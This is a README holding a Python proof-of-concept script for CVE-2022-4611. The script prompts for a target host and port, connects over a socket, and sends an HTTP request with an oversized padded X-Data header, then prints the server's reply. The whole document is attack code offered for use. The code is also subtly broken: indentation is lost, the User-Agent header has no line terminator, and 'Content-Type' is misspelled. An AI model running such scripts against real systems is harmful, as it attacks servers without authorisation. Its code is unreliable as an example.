README.md
Rendering markdown...
import socket
class CVE_2022_4611_demo_PoC():
def __init__(self):
def your_banner(self):
import os
self.clear_banner = os.system('cls')
print(self.clear_banner)
self.banner_text = 'The Demo Exploit CVE-2022-4611'
print(self.banner_text)
print("Copyright : Phamchie")
print("")
your_banner(self)
self.host = input("YOUR HOST => ")
self.port = input("YOUR PORT => ")
self.HOST = str(self.host)
self.PORT = int(self.port)
def start_exploit(self):
import time
self.t1 = "[+] Starting Exploiting On HOST : {}, PORT : {}"
self.date_time = 4
print(self.t1.format(self.HOST, self.PORT))
time.sleep(self.date_time)
start_exploit(self)
self.user_agent = f'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0'
self.data = f"GET / HTTP/1.1\r\n" \
f"Host: {self.HOST}\r\n" \
f"User-Agent: {self.user_agent}" \
f"Conten-Type: application/json\r\n" \
f"X-Data: " + "a" * (5*36) + "\r\n\r\n"
def exploited(self):
self.socket_handler = socket.socket(
socket.AF_INET,
socket.SOCK_STREAM
)
self.socket_handler.connect((self.HOST, self.PORT))
self.socket_handler.sendall(
self.data.encode()
)
def start_checking_output(self):
import time
self.times_sleeps = 1
self.t2 = "[+] Exploited Start Checking Output..."
print(self.t2)
time.sleep(self.times_sleeps)
self.output_database = self.socket_handler.recv(4069)
self.data_decode = self.output_database.decode()
print(self.data_decode)
start_checking_output(self)
self.socket_handler.close()
exploited(self)
CVE_2022_4611_demo_PoC()